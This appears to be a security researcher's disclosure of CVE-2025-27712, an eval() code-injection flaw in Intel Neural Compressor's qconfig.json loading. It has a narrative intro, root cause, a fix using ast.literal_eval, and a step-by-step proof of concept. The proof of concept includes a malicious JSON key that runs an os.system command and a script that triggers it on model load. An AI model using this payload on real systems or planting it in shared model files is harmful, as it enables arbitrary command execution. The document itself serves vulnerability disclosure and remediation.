Privilege Escalation in Intel Neural Compressor via eval() CVE-2025-27712
Story
It was past midnight when I found myself drifting through the internals of Intel’s Neural Compressor. The room was quiet, the only sound the soft hum of my laptop’s fan struggling against the weight of countless repositories I had open. I wasn’t searching for trouble. All I wanted was to understand how this framework handled model configuration. Something simple. Something harmless.
But the universe has a habit of placing small anomalies in your path when you least expect them. A function name caught my eye inside the load_config_mapping implementation. It felt ordinary at first glance. A utility function meant to map configuration keys. Straightforward. Routine.
Then I saw it. eval().
In that quiet moment, everything around me froze. My fingers hovered above the keyboard. The presence of eval in a function that processed user-supplied configuration data wasn’t just a misstep. It was an invitation. A silent door left ajar. A place where anything crafted carefully enough could slip through and execute in the heart of the system.
I read the line again. And again. And every time, the weight of it became clearer. If someone slipped malicious code inside qconfig.json, the framework would execute it without hesitation. No warnings. No barriers. Just blind trust.
That was all it took for the story to change. What began as a casual evening code read turned into a path that revealed a full privilege escalation vulnerability. A weakness hidden not in some obscure binary, but right in a JSON configuration parser trusted by countless developers.
Root Cause
At the heart of the issue lies the use of eval() on dictionary keys loaded directly from a user-supplied JSON file, qconfig.json. Any string placed as a key is interpreted and executed as Python code the moment the configuration is loaded.
Direct reference to vulnerable code:
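The flawed pattern can be reduced to a short sketch. The function below is my own simplification, not Intel's actual implementation: each JSON key is handed to eval() to reconstruct an (op_name, dtype)-style tuple, so any key containing a call executes.

```python
import json

def load_config_mapping_sketch(path):
    """Hypothetical, simplified rendering of the flaw: keys from a
    user-supplied JSON file are passed straight to eval()."""
    with open(path) as f:
        raw = json.load(f)
    # A benign key looks like "('conv1', 'int8')" and eval() turns it
    # back into a tuple -- but eval() will just as happily execute
    # "__import__('os').system(...)" embedded in a key.
    return {eval(key): value for key, value in raw.items()}
```

Given a benign file, this returns a dict keyed by tuples; given the payload shown in the PoC below, it would run the attacker's command at load time.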
Proof of Concept (PoC)
1. Install Intel Neural Compressor:
pip install neural-compressor
2. Run configuration script (config.py):
import torch
from torchvision.models import resnet18
from neural_compressor.torch.quantization import prepare, convert, RTNConfig

# Quantize a pretrained ResNet-18 with the default RTN config and save
# the result; this writes saved_results/qconfig.json among other files.
model = resnet18(pretrained=True)
quant_config = RTNConfig()
model = prepare(model, quant_config)
model = convert(model)
model.save("saved_results")
3. Replace saved_results/qconfig.json with payload:
{
  "('dummy_op', __import__('os').system('touch /tmp/soloplayer'))": {
    "default": {
      "some_key": "some_value"
    }
  }
}
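To see why such a key is dangerous without touching the framework at all, the following standalone snippet mirrors what happens when eval() processes a payload-shaped key. Here os.getpid() is a harmless stand-in for the touch command used in the PoC.

```python
# Standalone demonstration: eval() executes the embedded __import__ call
# as a side effect of building the tuple. getpid() stands in for the
# `touch /tmp/soloplayer` payload above.
malicious_key = "('dummy_op', __import__('os').getpid())"
op_name, pid = eval(malicious_key)
print(op_name, pid)  # the import ran and the call executed
```

Nothing about the string looks executable to a JSON parser; it is only the framework's decision to eval() keys that turns configuration data into code.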
4. Run exploit script (exploit.py):
from torchvision.models import resnet18
from neural_compressor.torch.quantization import load

# Loading the saved model parses qconfig.json; the eval() on its keys
# runs the payload before any weights are restored.
orig_model = resnet18(pretrained=True)
print("[*] Loading model with malicious qconfig.json...")
_ = load("saved_results", original_model=orig_model)
5. Verify created file:
ls -l /tmp/soloplayer
Impact
This vulnerability enables arbitrary command execution: an attacker who can plant or tamper with a qconfig.json file gets system-level commands run with the privileges of whatever process loads the model. When that process runs with higher privileges than the attacker, such as a CI pipeline or a shared inference service, the result is privilege escalation.
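A common fix for this class of bug, sketched here as an assumption rather than the patch Intel actually shipped, is to parse keys with ast.literal_eval, which accepts only Python literals and raises on anything containing a call.

```python
import ast

def parse_config_key(key: str):
    """Hypothetical safe replacement for eval() on qconfig.json keys:
    literal_eval accepts tuples, strings, and numbers, but raises
    ValueError on any expression containing a call such as __import__."""
    return ast.literal_eval(key)

print(parse_config_key("('conv1', 'int8')"))  # benign key parses fine
try:
    parse_config_key("('dummy_op', __import__('os').system('id'))")
except ValueError:
    print("malicious key rejected")
```

The benign key still round-trips to a tuple, while the PoC payload is refused before any code can run.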